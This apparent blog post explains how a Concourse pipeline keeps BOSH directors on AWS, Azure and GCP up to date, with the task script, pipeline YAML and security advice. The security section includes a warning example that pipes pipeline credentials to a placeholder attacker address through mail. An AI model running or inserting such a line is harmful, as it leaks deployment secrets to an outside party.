“BOSH deploys Concourse, and Concourse deploys BOSH” —Cloud Foundry koan
A BOSH Director is a VM (virtual machine) orchestrator which is itself a VM.
BOSH solves the problem of keeping its VMs’ applications (operating systems
(stemcells) and releases) up-to-date with the command, bosh deploy
; however,
this begs the question, “what keeps the BOSH Director itself up-to-date?”.
[Quis custodiet?]
We explore using Concourse, a Continuous Integration (CI) server, and bosh-deployment [Updating BOSH], in order to create a Concourse pipeline which updates, in turn, a BOSH director on AWS (Amazon Web Services), on Microsoft Azure, and GCP (Google Cloud Platform). Updating all three BOSH directors can be accomplished with a single click. [One click] Best of all, our directors are re-deployed with a recent stemcell, BOSH release, and CPI release. [How recent?]
0. Overview
Our Concourse pipeline is publicly-viewable, and can be seen at https://ci.nono.io/teams/main/pipelines/BOSH. It’s a straightforward pipeline which consists of three jobs, one for each director on each IaaS (Infrastructure as a Service): bosh-aws.nono.io, bosh-azure.nono.io, and bosh-gce.nono.io.
Below is a diagram of our Concourse configuration which describes the pipeline in greater detail. Note that we keep our credentials (e.g our AWS access key and secret) in LastPass (see items in red), but LastPass is not strictly necessary: credentials can be embedded directly in the BOSH manifests, can be passed as variables during the BOSH manifest creation, or can be maintained as files on the local hard drive.
1. Concourse Tasks
To build our Concourse pipeline, we begin with the the smallest configurable component, the Concourse task.
The Concourse task is often a set of Concourse resources (e.g GitHub
repositories containing BOSH manifests), environment variables (e.g. ${IAAS}
(the IaaS to which we’re deploying)), and perhaps most importantly, the shell
script which deploys the director.
1.0 Concourse Task Shell Script
Here is our annotated shell script our Concourse tasks use to deploy our BOSH director:
[Note: see next section, Simplify the Concourse Task, for a simpler task shell script; it’s a better starting point. We customize our BOSH directors in a manner which complicates our task shell script.]
#!/bin/bash
# We abort the script as soon as we hit an error (as soon as a command exits
# with a non-zero exit status)
set -e
# `cunnie-deployments` is the checked-out GitHub repo that contains our BOSH
# manifests and our directors' `-state.json` files; it also contains this
# script (task script) and task definition.
pushd cunnie-deployments
# We invoke the script that generates our BOSH director's manifest, e.g.
# `aws.sh`, `azure.sh`. The output, the BOSH director's manifest, is named
# `bosh-$IAAS.yml`, e.g. `bosh-aws.yml`
bin/$IAAS.sh
# Does ${DEPLOYMENTS_YML} have a complete set of interpolated variables?
# Abort if not (`--var-errs`).
bosh int bosh-$IAAS.yml \
--var-errs \
-l <(echo "$DEPLOYMENTS_YML") \
-l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml) \
> /dev/null
# We attempt to deploy our BOSH director. We prepare a git commit message
# regardless whether our attempt succeeds or fails because we need to retain any
# change to the BOSH director's `-state.json` file. This is necessary in cases
# where a deploy proceeds far enough to create a broken director VM, for
# subsequent deploys must be able to destroy the broken director VM in order to
# free up its IP address so that the current deploy will succeed. The crucial
# information needed to destroy the broken director VM is its VM's ID, which is
# recorded in the `-state.json` file.
# Note that `set -e` does not trigger an abort if the command that returns a
# non-zero exit code is the subject of an `if` block, i.e. `if bosh create-env`;
# this gives us the breathing room to commit our results regardless of whether
# `bosh create-env` succeeded or failed
if bosh create-env bosh-$IAAS.yml \
-l <(echo "$DEPLOYMENTS_YML") \
-l <(curl https://raw.githubusercontent.com/cunnie/sslip.io/master/conf/sslip.io%2Bnono.io.yml); then
GIT_COMMIT_MESSAGE="CI PASS: $IAAS BOSH deploy :airplane:"
DEPLOY_EXIT_STATUS=0
else
GIT_COMMIT_MESSAGE="CI FAIL: $IAAS BOSH deploy :airplane:"
DEPLOY_EXIT_STATUS=1
fi
# Do we need to commit anything? If a new director hasn't been deployed (most
# often because there's been no change to the manifest, releases, or stemcell),
# then we don't need to commit
if ! git diff --quiet HEAD --; then
# If we're in this block, then there has been a deployment. Let's set our
# git author to avoid git's `*** Please tell me who you are.` error.
git config --global user.name "Concourse CI"
git config --global user.email brian.cunnie@gmail.com
# We check out our branch's HEAD because Concourse's git-resource leaves us
# in `detached HEAD` state. ${DEPLOYMENTS_BRANCH} is typically set to
# `master`, but may be set to something else (usually while testing).
git checkout $DEPLOYMENTS_BRANCH
git add .
git commit -m"$GIT_COMMIT_MESSAGE"
fi
popd
# We copy our repo with its new commit to a new directory. The Concourse job,
# after it finishes running this task, will push the new commit to GitHub.
# Note that `cp -R` works as well as `rsync`; we use `rsync` by force of
# habit.
rsync -aH cunnie-deployments/ cunnie-deployments-with-state/
# We exit with the return code of `bosh create-env`; if the deploy failed, then
# this Concourse task failed
exit $DEPLOY_EXIT_STATUS
For those interested in the scripts which generate the BOSH director manifests
(e.g. aws.sh
), they were covered in an earlier blog
post. For links to the scripts
and the manifests they generate, see the table below:
IaaS | Script | Generated Manifest |
---|---|---|
AWS | aws.sh | bosh-aws.yml |
Azure | azure.sh | bosh-azure.yml |
GCP | gce.sh | bosh-gce.yml |
1.1 Simplify the Concourse Task Script
Simplify the Concourse task script. Specifically, inline the
bosh-${IAAS}.sh
script, then collapse the two bosh
interpolate
commands into the singular bosh create-env
command.
Start with a simple Concourse task script.
Really. Don’t use the task script we use,
[Why so complicated?] ,
the one listed above. Instead, start with a
simplified task script, like
bosh-simple.sh
.
We have tested it; it successfully deploys a director.
1.2 Concourse Task Configuration file
Now that we have our task’s shell script, we turn our attention to our task’s (YAML) configuration file. It can be viewed on GitHub, and is displayed below, too:
---
platform: linux
image_resource:
type: docker-image
source:
repository: cunnie/fedora-golang-bosh
inputs:
- name: cunnie-deployments
- name: bosh-deployment
outputs:
- name: cunnie-deployments-with-state
params:
# vainly default branch to master, but it's always overridden from the pipeline
DEPLOYMENTS_BRANCH: 'master'
DEPLOYMENTS_YML: ''
IAAS: ''
run:
path: cunnie-deployments/ci/tasks/bosh.sh
Notes:
image_resource:
We use a custom-built Docker image,
cunnie/fedora-golang-bosh
(https://hub.docker.com/r/cunnie/fedora-golang-bosh/~/dockerfile/); but you
may choose to use your own Docker image; just be sure that the BOSH
CLI is installed. Our image is fairly
hefty (450 MB), for it has a rich set of tools available to us when we need to
intercept the container to
troubleshoot a build.
inputs:
We have two inputs:
bosh-deployment
, a git repo
which contains the manifests and tools necessary to deploy a BOSH director (this
is the canonical way to deploy a BOSH director), and
cunnie-deployments
, a git repo which
contains our BOSH directors’ manifests and state files. Also, this repo contains
the required Concourse task definition (ci/tasks/bosh.yml
) and script
(ci/tasks/bosh.sh
).
outputs:
We have one output, cunnie-deployments-with-state
, which is the
same as the input, cunnie-deployments
. Concourse prohibits an input from also
being an output, so our script copies the contents of one to the other.
cunnie-deployments-with-state
includes the commits made by the task (in the
case of a deploy, the state file and possibly the BOSH director’s manifest).
This output is used by a subsequent step in the Concourse job which will push
any git commits to GitHub (although this Concourse task may make git commits,
it won’t push them — it leaves that responsibility to the Concourse job).
params:
DEPLOYMENTS_BRANCH
is almost always set to master
; it refers to
the branch in the cunnie-deployments
repo. IAAS
is either aws
, azure
, or
gce
. DEPLOYMENTS_YML
is YAML-formatted and contains secrets needed to
deploy; sample contents can be viewed in an earlier blog
post.
[Note: you may opt to bypass the task configuration file completely and embed
the necessary information into pipeline.yml
;
here
is an example of embedding the task configuration directly into the pipeline.]
2. Concourse Jobs
The Concourse job is straightforward:
- It checks out the
cunnie-deployments
andbosh-deployment
git repos - It runs the task which deploys the BOSH director to the specified IaaS
- It pushes changes to the director manifest (
bosh-${IAAS}.yml
) and the director state (bosh-${IAAS}-state.json
) to thecunnie-deployments
repo regardless of whether the deploy succeeded or failed (i.e. theensure
directive)
Here is the Concourse job definition which deploys the BOSH director to the AWS IaaS:
jobs:
- name: bosh-aws.nono.io
plan:
- get: cunnie-deployments
- get: bosh-deployment
- task: deploy
file: cunnie-deployments/ci/tasks/bosh.yml
params:
DEPLOYMENTS_BRANCH: master
DEPLOYMENTS_YML: ((deployments_yml))
IAAS: aws
ensure:
put: cunnie-deployments
params:
repository: cunnie-deployments-with-state/
3. Concourse Pipeline
The full Concourse pipeline (pipeline.yml
) can be seen
here.
Below is an abbreviated portion which shows the Concourse resources and the first
job (which deploys the AWS BOSH director):
# fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"
jobs:
- name: bosh-aws.nono.io
plan:
- get: cunnie-deployments
- get: bosh-deployment
- task: deploy
file: cunnie-deployments/ci/tasks/bosh.yml
params:
DEPLOYMENTS_BRANCH: master
DEPLOYMENTS_YML: ((deployments_yml))
IAAS: aws
ensure:
put: cunnie-deployments
params:
repository: cunnie-deployments-with-state/
# Other jobs redacted for brevity
resources:
- name: cunnie-deployments
type: git
source:
uri: git@github.com:cunnie/deployments.git
private_key: ((github_deployments_key))
branch: master
- name: bosh-deployment
type: git
source:
uri: https://github.com/cloudfoundry/bosh-deployment.git
Notes:
The first line is a convenience comment; it shows the fly
(Concourse CLI)
command which updates the Concourse server’s pipeline after changes have been
made to the pipeline.yml
file. We cut-and-paste that comment into our shell
whenever we make a change to pipeline.yml
in order to propagate the changes to
the pipeline to our Concourse server:
fly -t nono sp -p BOSH -c ~/workspace/deployments/ci/pipeline.yml -v github_deployments_key="$(lpass show --note github_deployments_key)" -v deployments_yml="$(lpass show --note deployments.yml)"
We have already discussed deployments_yml
(i.e. the Concourse task environment
variable/parameter DEPLOYMENTS_YML
), but the other variable,
github_deployments_key
, warrants discussion. It is a GitHub deploy
key which allows
our job to push changes to the cunnie-deployments
repo
[Interpolation] .
We’d like to discuss how we stop the pipeline when the deploy of a BOSH director
fails. We use Concourse’s passed
directive. For example, if our deploy of the AWS director fails, we do not
want to deploy the Azure director.
The following shows the diff
between the job to deploy the AWS director and
the job to deploy Azure director. Pay special attention to the passed
and
trigger
directives: the deploy of the Azure director is kicked off if and only
if there has been a successful deploy of the AWS director. This limits the
damage caused by a flawed configuration: only one director is knocked offline
(typically the first one, AWS), not all three.
-- name: bosh-aws.nono.io
+- name: bosh-azure.nono.io
plan:
- get: cunnie-deployments
+ passed: [ bosh-aws.nono.io ]
+ trigger: true
- get: bosh-deployment
+ passed: [ bosh-aws.nono.io ]
+ trigger: true
- task: deploy
file: cunnie-deployments/ci/tasks/bosh.yml
params:
DEPLOYMENTS_BRANCH: master
DEPLOYMENTS_YML: ((deployments_yml))
- IAAS: aws
+ IAAS: azure
ensure:
put: cunnie-deployments
params:
4. Security
Restrict your Concourse teams to people you trust, don’t unnecessarily expose
your pipelines or publish your pipelines’ configurations (.yml
files).
Similarly, restrict access to your GitHub repo which has your director manifests
and Concourse scripts.
Our credentials are stored in our Concourse pipeline, and they can be easily revealed by a trusted user with the following command:
fly -t nono get-pipeline -p BOSH
These credentials include IaaS credentials, which will allow a bad actor to spin up multiple VMs to run, say, Bitcoin mining. A co-worker of the author whose credentials were compromised had unauthorized AWS charges exceeding $3k.
It is also important to restrict access to the GitHub repo which contains the
scripts that are run. Although the repo does not contain credentials, it enables
the execution of commands which can reveal the credentials. For example, the
following line of code could be added to the ci/tasks/bosh.sh
script to email
the credentials to the bad actor:
echo ${DEPLOYMENTS_YML} | mail -s "secret credentials" bad.actor@mailinator.com
Footnotes
[Quis custodiet?] “Who updates the VM [BOSH director] that keeps the other VMs updated?” is the question, versions of which have been asked as long ago as the days of the Roman poet Juvenal, who famously asked, “Quis custodiet ipsos custodes?” and as recently as this century by comic book writer Alan Moore, who phrased it, “Who watches the Watchmen?”
[How recent?]
How fresh is bosh-deployment
? Fresh. bosh-deployment
is a quite
active git repo, typically updated several times or more each
week.
It’s the tool that the BOSH team, and many Cloud Foundry teams, use to keep
their BOSH directors current.
[Updating BOSH] In the early days, the BOSH micro plugin was the mechanism to update the BOSH director. There were several drawbacks to the micro plugin, one of which is that it forced the BOSH CLI to have an understanding of the API for various IaaSes, breaking the Cloud Layer abstraction model.
Another drawback of the BOSH micro plugin was that it was brittle, so much so that it was a common pattern to deploy a BOSH director whose sole purpose was to deploy the “real” BOSH director. “Ha!” one might ask, “But how did you keep that first BOSH director up-to-date?” The answer is simple: you didn’t. You left that first BOSH director running and never touched it except to redeploy the “real” BOSH director. You might spin it down if you weren’t using it, but you never deleted it or updated it.
These were serious problems, and to address them the BOSH Core team wrote
bosh-init
,
a Golang-based executable whose purpose was to deploy BOSH directors. It adhered
to the Cloud Layer abstraction models (it used the existing CPIs (Cloud Provider
Interfaces) for the existing IaaSes (VMware
vSphere,
Google Cloud
Platform
(GCP),
OpenStack,
Microsoft
Azure, among
others)).
By April 30, 2015, bosh-init
was production-ready, and the BOSH documentation
was updated
to reflect the new world order.
But all was not perfect in the Garden of Eden, for the introduction of
bosh-init
split the CLIs: whereas before there was one BOSH CLI, now there
were two: bosh
, the original Ruby-based CLI for managing a BOSH director’s
deployment, and bosh-init
for deploying a BOSH director itself. In many ways
this resembled the Western
Schism, a dark chapter in the
Roman Catholic church when there were two popes (who had the terrible habit of
excommunicating each other). The BOSH development team remedied this situation
by creating a third CLI, the Golang-based
CLI. In this regard, the BOSH development
team’s approach mirrored the approach attempted by the Catholic cardinals,
who elected a third pope. The BOSH team’s approach succeeded, but the
cardinals’ didn’t (they were left with three popes running around
excommunicating each other).
[One click] It’s technically possible to kick off the builds with zero clicks — to kick off the build automatically if, say, a commit is pushed to the bosh-deployment repository. The modification to the pipeline is trivial:
- name: bosh-aws.nono.io
plan:
- get: cunnie-deployments
- get: bosh-deployment
+ trigger: true
- task: deploy
However, the decision to trigger automatically is not without risks: the BOSH
director may be in the middle of a delicate task, such as updating a deployment,
and won’t have the opportunity to gracefully bring itself down, forbosh create-env
is relentless, brooks no delays, and gives no quarter.
On a more technical note, bosh create-env
, although it will attempt to contact
the BOSH agent on the original
BOSH director in order to terminate the jobs and shut down the VM, it does not
run the drain scripts (scripts which allow
the BOSH jobs to clean up and get into a state where they can be safely
stopped).
There is discussion within the BOSH development team whether to modify the
behavior of bosh create-env
to make it run the drain scripts. On the positive
side, it will allow a more cavalier approach to re-deploying the director, and
make the behavior of bosh create-env
more closely approximate the behavior of
a BOSH director. On the downside, the time to deploy a BOSH director may vary
widely, dependent on the time it takes for the drain scripts to complete.
[Interpolation] Our GitHub deploy key resembles the following (not our real key) [Elliptic-curve] :
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
-----END EC PRIVATE KEY-----
Concourse, when passed the flag ... -v github_deployments_key="$(lpass show --note github_deployments_key)"
will interpolate this section of
pipeline.yml
:
type: git
source:
uri: git@github.com:cunnie/deployments.git
private_key: ((github_deployments_key))
After interpolation, the pipeline looks like this:
- name: cunnie-deployments
type: git
source:
uri: git@github.com:cunnie/deployments.git
# previously: private_key: ((github_deployments_key))
private_key: |
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIMxcR2wlxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxqY/VyDTL
AwEHoUQDQgAEmBUxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxjY98wOPVZ
Ayz++1vHXODWeiC/CjNu7hOVaB682ZZfCw==
-----END EC PRIVATE KEY-----
If your pipeline is not public, it may be easier to skip variable interpolation and embed the credential(s) directly.
[Why so complicated?]
Our Concourse task is complicated (i.e. bosh.sh
calls bosh-${IAAS}.sh
, calls
bosh
CLI three times) because we have requirements beyond merely deploying a
BOSH director:
We retain intermediate BOSH manifests (e.g.
bosh-aws.yml
, manifests that are completely populated with the exception of the secrets (passwords, credentials, private keys). The sole purpose of the firstbosh interpolate
commands is to generate the intermediate manifest.
We realize that our love of the intermediate manifests is not wholly rational: time was when a working BOSH manifest was a precious thing, something to tend to and to preserve. With the advent ofbosh-deployment
, which reliably generates BOSH manifests, the intermediate manifests have diminished in importance, and are now merely artifacts of a bygone age. And yet we still cling to them, for they provide a sense of comfort, like a mother’s hot apple pie.We prefer to set our own passwords rather than use the ones auto-generated [auto-passwords] by the BOSH CLI. This has two implications:
It forces us to set the password variables in a counter-intuitive manner (e.g.
bosh interpolate ... -v admin_password='((admin_password))' ...
) (which says, in effect, “replace all occurrences of ‘((admin_password))’ with ‘((admin_password))’.”), which prevents the BOSH CLI from using its auto-generated passwords and paves the way to subsequently interpolate our passwords. This adds several lines to our scripts.It forces us to check to make sure that we haven’t overlooked any variables (i.e. we run
bosh interpolate --var-errs ...
), so that, for example, our director’s password is set toIReturnedAndSawUnderTheSun
and not((admin_password))
). This adds several more lines to our scripts.
Our BOSH director uses certificates issued by a recognized CA (Certificate Authority) (in our case, Comodo). This requires us to create a manifest operations file (e.g.
etc/aws.yml
) which we pass tobosh interpolate
which overrides the auto-generated SSL certificate & key with our certificate & key.Some of our BOSH directors (e.g. bosh-aws.nono.io) are more than mere BOSH directors — they are also nginx servers (web servers), DNS (Domain Name System) servers, and NTP (Network Time Protocol) servers. This adds three more lines to our scripts.
Note: one advantage of using CA-issued certificates and easy-to-remember
passwords is that it enables one to reach the BOSH director via the CLI without
needing the creds.yml
file — one can sit at a new workstation, type bosh -e bosh-gce.nono.io login
, and proceed to manage deployments, releases, stemcells,
etc….
[auto-passwords] The BOSH CLI generates
high-entropy
passwords when --vars-store
flag is passed.
Here is a list of sample passwords that bosh create-env --vars-store=...
creates:
admin_password: qn7hc6zsq0nphhsvojx3
blobstore_agent_password: iut5wdyeo5kkhvqoerj0
blobstore_director_password: wm0qgnzdwgy8k1hnm4nq
hm_password: plk829eob45khq6o9dl5
mbus_bootstrap_password: nf16h5e9j120uqp35hlr
nats_password: gr4s0xmj4s5iccqv69dt
postgres_password: 7nxuq714hxcta513778g
registry_password: ffxnhu4xtgh7lsxu7xpl
Note that the passwords are 20 bytes long and consist of random sequence of numbers and lowercase letters. Each byte can be one of 36 possibilites (10 numbers plus 26 letters). Given that there are 20 bytes, the total number of combinations is 3620, 1.33 x 1031, effectively rendering the password immune to a brute-force attack (even if you could make a million attempts every second, it would still require 4 × 1017 years to exhaust all combinations. In other words, you’d crack the password long after the Stelliferous Era ended and you were well into the Degenerate Era).
[Elliptic-curve]We use elliptic-curve cryptography (ECC) keys, for they are much shorter than an RSA key of equivalent strength, and thus more manageable. Unfortunately, they are not universally accepted (e.g. AWS will respond with “Error importing Key Pair Key is not in valid OpenSSH public key format” when importing an EC public key).
Where elliptic-curve cryptography is concerned, GitHub is ahead of the proverbial curve, and AWS, behind.
Corrections & Updates
2017-12-01
We suggest simplifying the Concourse task script. The Concourse task script
executes the BOSH CLI three times (bosh int
twice and bosh create-env
once),
but need only execute it once (bosh create-env
) when intermediate artifacts
aren’t desired.
2017-11-25
David McClure pointed out that the OpenStack link was missing; it has been added. Thanks, David.